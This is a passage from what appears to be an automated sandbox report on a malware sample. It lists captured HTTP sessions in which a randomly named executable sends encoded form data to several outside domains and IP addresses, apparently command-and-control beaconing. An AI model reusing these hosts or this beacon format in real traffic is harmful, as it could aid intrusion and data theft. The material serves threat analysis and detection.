                                                    Jul 3, 2024 17:51:52.285211086 CEST1236INData Raw: 24 ed d4 df cc 2a 02 8f 9f 82 8c 50 47 e4 c1 02 01 14 22 6e 95 a6 06 42 cb 95 9c 47 dc 64 82 cd 7c a9 24 3c b6 8a ba 05 ab 50 e0 9a fc 40 d9 e4 b1 c5 2d a4 86 7e c8 8d e5 63 0e 51 c9 a7 3c ce 68 88 63 62 89 3f 16 f0 40 8d 65 da ee 17 2c 30 77 4b
                                                    Data Ascii: $*PG"nBGd|$<P@-~cQ<hcb?@e,0wKT6iMB)}lP%a5ogFm)RB3fK\s}}VpcX=L\}PS?Qr(22mgQ"01])f_fJ[&mDX,J
                                                    Jul 3, 2024 17:51:52.285393953 CEST1236INData Raw: 27 6d 94 f2 48 3a 0f 1d ef d1 44 55 bb d7 2b fc be 87 22 a3 97 06 4f 6e 6f f5 d5 d9 6f 60 15 09 94 b5 2a 6d 92 4f c3 71 c8 02 70 f8 e4 d3 ef af dd ef a9 c0 dd e3 c0 df 74 bf ba be f6 5e 02 dc 3b 0e fc ed d5 45 a7 f7 cd 4b 80 fb c7 81 bf ee 7c 33
                                                    Data Ascii: 'mH:DU+"Onoo`*mOqpt^;EK|3E/w/<MIW''$[s/^=O!b(5)'^ZCz8-O:-op4Q0OBil,>^Lb.l+}.zQDGW=DA/
                                                    Jul 3, 2024 17:51:52.285404921 CEST1236INData Raw: 47 68 0c ff a3 d7 8e 6c e0 24 5a 2e 71 c1 a9 c2 af f0 30 8f b8 c9 f0 ec 13 77 3a 90 e3 1e 74 aa 59 e6 13 f7 1c 16 14 28 b7 90 1a 9f 94 7b ab ae 44 be 5f 2c 36 5a e9 83 58 f3 68 cd c0 9d aa 73 aa 70 e6 01 0b ef 63 ad 72 19 a1 44 42 e9 4d 15 32 0d
                                                    Data Ascii: Ghl$Z.q0w:tY({D_,6ZXhspcrDBM2,-/(Ar+p_tR.fU\N"|+HS&JW=o(p4Y:`bbg,U/{8p>A%8(kUdOyd4u_*[oaHL4l4/J3]xB
                                                    Jul 3, 2024 17:51:52.285415888 CEST1236INData Raw: 19 ae 2b 3c 84 d7 7d 31 22 ed 56 60 86 4a 5a cd 8c 7d 11 ea b2 f8 18 ee cb f8 ae cb 8f 61 f7 5e 87 dd ab c0 66 61 08 f2 65 6a 94 a5 87 31 5f a6 c4 b2 f8 30 ee cb 54 58 16 1f c6 ed bf 06 b7 7f 18 77 f0 1a dc 41 05 ee 84 4f 78 44 c3 19 93 34 10 39
                                                    Data Ascii: +<}1"V`JZ}a^faej1_0TXwAOxD49P,kb,e4_V\U<]F8 UF5NiP+OTR.:f2~f4W_1l&)cBK2RAhuG%bEgJY3:(
                                                    Jul 3, 2024 17:51:52.285427094 CEST1236INData Raw: 28 72 14 6c a6 72 4b 3b a7 e4 90 5b f2 c5 3c 65 3a e6 72 d9 cf 32 6d 7d 6f b8 15 04 19 61 e8 f1 ad ba be 25 7b 74 4c f5 04 e8 dc 17 ce d0 3d 25 67 1e b3 cc 3f 6e e6 ca 66 92 4d 78 cc 2c 57 f2 89 69 ab 13 4f 69 fb 21 37 96 8f 67 05 20 48 eb 8f 05
                                                    Data Ascii: (rlrK;[<e:r2m}oa%{tL=%g?nfMx,WiOi!7g H<OwJ|;'<[?d#+_8)9:wy*Lf!5c{{rS;)9fW4c509}c)\OaNJY29'%rk{rcxVd
                                                    Jul 3, 2024 17:51:52.295702934 CEST1236INData Raw: a2 8c 4c 81 c7 89 f5 7b 9e 47 ae 3d af 8c 2d 5a fa 63 26 44 c0 c2 fb 21 fa db cf b5 a8 9f 1f 33 ce 62 83 6d 9b e0 02 4d db 4e f1 30 2b 9f 63 95 eb 76 29 5b bb a0 5c ba a4 5d 30 a3 ff c6 34 77 13 7f ef c6 35 42 da e6 14 29 b5 a6 6a 3c ee 9e 37 50
                                                    Data Ascii: L{G=-Zc&D!3bmMN0+cv)[\]04w5B)j<7Pdkr6L<#C|TYO[&x_bU.u.xG,=;T4#@QV4j0O@F*M#\=">Y!h Txoj7%ZHQ(LQ&Z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.649740192.185.208.8805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:54.194305897 CEST349OUTGET /2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.epicbazaarhub.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:54.928082943 CEST509INHTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 03 Jul 2024 15:51:54 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Location: http://epicbazaarhub.com/2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Bp=2LpD8tLh
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.649741121.254.178.230805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:00.572144032 CEST604OUTPOST /wvam/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    Origin: http://www.rz6grmvv.shop
                                                    Referer: http://www.rz6grmvv.shop/wvam/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 6b 72 6c 59 4a 55 71 64 59 53 39 4b 30 33 33 55 6b 49 6b 4c 74 6f 66 78 70 63 74 64 6e 34 6f 41 76 32 73 31 63 76 54 4b 2f 38 61 64 77 66 39 37 55 6d 51 33 67 51 42 70 61 7a 68 59 6e 32 6d 41 6f 6b 74 67 6a 47 54 56 39 55 63 43 4b 31 4f 52 61 55 41 37 44 65 42 34 66 46 6b 4e 37 39 76 30 36 74 47 6a 45 44 54 66 79 4b 4e 69 74 70 32 56 52 73 7a 36 32 36 39 43 2f 62 62 62 46 43 72 73 55 4a 6a 63 45 6b 56 38 50 61 43 61 49 36 68 67 4a 6a 72 6b 54 33 4f 45 62 30 6c 31 6b 68 4a 78 42 66 7a 49 74 4f 4f 48 43 58 51 6b 52 33 41 6e 51 45 73 79 2f 6e 67 6a 67 73 71 6f 6d 76 41 45 38 4e 33 50 56 49 32 4c 38 49 50 35
                                                    Data Ascii: 7Dihs8p=krlYJUqdYS9K033UkIkLtofxpctdn4oAv2s1cvTK/8adwf97UmQ3gQBpazhYn2mAoktgjGTV9UcCK1ORaUA7DeB4fFkN79v06tGjEDTfyKNitp2VRsz6269C/bbbFCrsUJjcEkV8PaCaI6hgJjrkT3OEb0l1khJxBfzItOOHCXQkR3AnQEsy/ngjgsqomvAE8N3PVI2L8IP5
                                                    Jul 3, 2024 17:52:01.480489016 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:00 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.649742121.254.178.230805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:03.100645065 CEST628OUTPOST /wvam/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    Origin: http://www.rz6grmvv.shop
                                                    Referer: http://www.rz6grmvv.shop/wvam/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 6b 72 6c 59 4a 55 71 64 59 53 39 4b 32 55 76 55 6f 4c 63 4c 68 59 66 77 73 63 74 64 31 34 6f 63 76 32 67 31 63 72 4c 61 2f 4f 75 64 77 2b 4e 37 54 58 51 33 31 51 42 70 52 54 67 53 34 47 6d 50 6f 6b 78 47 6a 45 33 56 39 55 67 43 4b 33 47 52 62 6a 55 38 42 4f 42 36 51 6c 6b 4c 31 64 76 30 36 74 47 6a 45 48 37 35 79 4a 39 69 73 61 65 56 54 4a 48 35 70 4b 39 64 34 62 62 62 42 43 72 6f 55 4a 6a 45 45 67 55 70 50 5a 36 61 49 37 52 67 4a 77 7a 6a 64 33 4f 47 46 30 6b 31 67 56 51 76 59 65 4b 30 69 4d 61 78 66 33 63 6b 64 68 42 39 4d 33 73 52 74 33 41 68 67 75 79 61 6d 50 41 75 2b 4e 50 50 48 66 36 73 7a 38 71 61 64 6f 44 75 45 4c 2f 63 37 5a 2f 67 44 6e 33 4d 75 75 6e 31 32 77 3d 3d
                                                    Data Ascii: 7Dihs8p=krlYJUqdYS9K2UvUoLcLhYfwsctd14ocv2g1crLa/Oudw+N7TXQ31QBpRTgS4GmPokxGjE3V9UgCK3GRbjU8BOB6QlkL1dv06tGjEH75yJ9isaeVTJH5pK9d4bbbBCroUJjEEgUpPZ6aI7RgJwzjd3OGF0k1gVQvYeK0iMaxf3ckdhB9M3sRt3AhguyamPAu+NPPHf6sz8qadoDuEL/c7Z/gDn3Muun12w==
                                                    Jul 3, 2024 17:52:04.033926010 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:03 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.649743121.254.178.230805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:05.932557106 CEST1641OUTPOST /wvam/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    Origin: http://www.rz6grmvv.shop
                                                    Referer: http://www.rz6grmvv.shop/wvam/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 6b 72 6c 59 4a 55 71 64 59 53 39 4b 32 55 76 55 6f 4c 63 4c 68 59 66 77 73 63 74 64 31 34 6f 63 76 32 67 31 63 72 4c 61 2f 4f 57 64 77 4d 46 37 55 45 6f 33 6e 67 42 70 65 44 67 54 34 47 6d 6f 6f 6b 70 43 6a 45 37 76 39 52 6b 43 4c 56 2b 52 53 79 55 38 4c 4f 42 36 62 46 6b 4f 37 39 75 75 36 74 32 6e 45 44 66 35 79 4a 39 69 73 66 61 56 58 63 7a 35 72 4b 39 43 2f 62 62 58 46 43 71 33 55 4a 72 55 45 67 41 35 50 6f 61 61 49 62 42 67 49 43 72 6a 56 33 4f 2b 41 30 6b 62 67 51 49 4f 59 66 6e 4e 69 4e 66 71 66 77 55 6b 65 67 73 63 55 47 6f 65 32 55 45 68 2f 65 69 73 75 4c 64 63 37 38 6a 74 4d 4d 32 76 2b 34 79 42 65 66 6e 75 45 72 43 64 37 2f 43 49 46 51 32 79 71 66 61 79 79 72 6d 36 71 32 63 43 76 63 69 4e 6a 44 44 56 68 5a 33 43 46 67 37 55 72 58 45 70 36 69 66 35 5a 48 6f 41 36 4b 70 69 73 6e 72 53 4d 50 49 6d 35 50 6e 72 55 79 30 68 36 44 67 36 34 62 74 5a 58 37 62 58 6c 6f 2b 5a 6c 5a 66 49 58 4b 59 46 2f 4a 31 55 75 47 71 41 2b 46 54 4a 57 69 66 39 49 2f 4a 63 6e 41 32 4e 62 50 [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=krlYJUqdYS9K2UvUoLcLhYfwsctd14ocv2g1crLa/OWdwMF7UEo3ngBpeDgT4GmookpCjE7v9RkCLV+RSyU8LOB6bFkO79uu6t2nEDf5yJ9isfaVXcz5rK9C/bbXFCq3UJrUEgA5PoaaIbBgICrjV3O+A0kbgQIOYfnNiNfqfwUkegscUGoe2UEh/eisuLdc78jtMM2v+4yBefnuErCd7/CIFQ2yqfayyrm6q2cCvciNjDDVhZ3CFg7UrXEp6if5ZHoA6KpisnrSMPIm5PnrUy0h6Dg64btZX7bXlo+ZlZfIXKYF/J1UuGqA+FTJWif9I/JcnA2NbPz4Bv+Aa/kTZvw6Um6crSKvUux1/ytkdiGNM8T/7xjHrYpZYD9IwglmOr7upSnYEDuzj+dq3lim0EywskNwNM802vttFoYjZGPhPRMyBbbZcEi2gvHjvRo7RlcKvAeKC7/JlTUDdPO5SGRCGhf7vcF7QhQPQL/7T7/ffv2Z28OIEAvBL6Lk4gks/yo+p5tPD65IyYb9WhcfRpXjq8AKFTWWpc2k49FBwvAXtGSn05N9OR5LPg7Zdp/NqiXvYW355menURAk51T6UJzmiVSaDUYLnYQSmD1Pw5q9bSqydFpoW+hdJw9YGqOs49wAoJwchD3UJEiS4azbaaVvJfiAxiBakWetiQi5r+eylJe3YV8fDVtL7YzlmEGOInKQDAGdFoc1JXwe5rA6LuM6/81MZAPc3sg+rm2QLQrf8IMPJ3l6RKTUTcTIeMyCOeaigWwVkO8exoOz8rFTI6t7GEiMNGYeKwjG7DJ2wEwK8vNfsEt/RWLeUMCunX/TnAECLUBLtZi2+gitoVIeleRDVnXSPggHpqCa2dlSlRY1N5z2yujUN9/CkQkSPh/wsjdFheVmoItpA7WQOHJ4nXuheohSBwPIqMa4tR9g8QeUQL8Cd3mD8Z6PsU+s3uof4trSupX9Oz+PHmfH920Q6GjjZ7WBYVydWBqAzbXt8+xI [TRUNCATED]
                                                    Jul 3, 2024 17:52:06.848774910 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:06 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.649744121.254.178.230805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:08.490236044 CEST345OUTGET /wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:09.381258011 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:08 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.649746203.161.49.220805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:14.545154095 CEST604OUTPOST /oui5/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    Origin: http://www.hellokong.xyz
                                                    Referer: http://www.hellokong.xyz/oui5/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 66 44 7a 73 4b 2f 58 4a 79 61 32 75 52 63 35 4d 6e 6d 63 6d 74 51 38 46 63 64 6e 7a 32 4f 75 62 6d 79 57 35 31 35 42 77 6f 65 41 51 6c 69 38 41 4d 61 74 31 39 4f 67 4d 76 72 4d 38 37 53 4b 62 65 55 64 6e 45 50 4e 73 2b 59 52 41 32 4e 65 53 70 43 52 57 55 58 55 41 42 53 69 6b 4b 5a 53 44 54 35 35 2b 4c 43 69 35 4c 77 6d 75 36 45 6b 49 4c 4f 7a 57 6d 79 4e 38 69 72 5a 53 73 6f 50 76 55 78 49 61 6d 33 61 50 42 7a 75 6a 55 58 6b 55 63 71 37 72 31 42 2b 78 54 61 6d 79 6e 56 38 73 48 6a 71 6d 6a 6a 6c 46 48 49 54 36 6f 51 4b 78 70 59 72 41 4e 4d 57 73 74 68 43 78 56 35 43 51 78 76 4b 4c 45 30 4a 70 33 7a 52 31
                                                    Data Ascii: 7Dihs8p=fDzsK/XJya2uRc5MnmcmtQ8Fcdnz2OubmyW515BwoeAQli8AMat19OgMvrM87SKbeUdnEPNs+YRA2NeSpCRWUXUABSikKZSDT55+LCi5Lwmu6EkILOzWmyN8irZSsoPvUxIam3aPBzujUXkUcq7r1B+xTamynV8sHjqmjjlFHIT6oQKxpYrANMWsthCxV5CQxvKLE0Jp3zR1
                                                    Jul 3, 2024 17:52:15.130449057 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:15 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.649747203.161.49.220805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:17.118135929 CEST628OUTPOST /oui5/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    Origin: http://www.hellokong.xyz
                                                    Referer: http://www.hellokong.xyz/oui5/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 66 44 7a 73 4b 2f 58 4a 79 61 32 75 51 38 4a 4d 67 47 67 6d 6c 51 39 33 41 4e 6e 7a 39 75 75 58 6d 79 4b 35 31 34 46 61 6f 71 73 51 69 41 6b 41 65 50 52 31 38 4f 67 4d 6c 4c 4d 6c 2f 53 4b 71 65 55 52 46 45 4f 78 73 2b 65 39 41 32 50 47 53 70 55 5a 56 57 48 55 43 4f 79 69 6d 48 35 53 44 54 35 35 2b 4c 44 54 6b 4c 7a 57 75 37 33 4d 49 5a 72 50 52 6f 53 4e 2f 30 37 5a 53 6f 6f 50 72 55 78 4a 50 6d 31 2b 70 42 32 69 6a 55 57 55 55 64 2f 48 6f 2f 42 2f 34 4f 71 6e 62 30 51 5a 62 65 79 37 38 38 31 77 6f 66 4a 61 51 74 6d 4c 72 31 72 72 6a 66 63 32 75 74 6a 61 44 56 5a 43 36 7a 76 79 4c 57 6a 46 4f 34 48 30 57 53 44 45 41 70 72 79 63 73 75 52 62 73 47 67 33 52 34 6a 69 61 67 3d 3d
                                                    Data Ascii: 7Dihs8p=fDzsK/XJya2uQ8JMgGgmlQ93ANnz9uuXmyK514FaoqsQiAkAePR18OgMlLMl/SKqeURFEOxs+e9A2PGSpUZVWHUCOyimH5SDT55+LDTkLzWu73MIZrPRoSN/07ZSooPrUxJPm1+pB2ijUWUUd/Ho/B/4Oqnb0QZbey7881wofJaQtmLr1rrjfc2utjaDVZC6zvyLWjFO4H0WSDEAprycsuRbsGg3R4jiag==
                                                    Jul 3, 2024 17:52:17.701555967 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:17 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
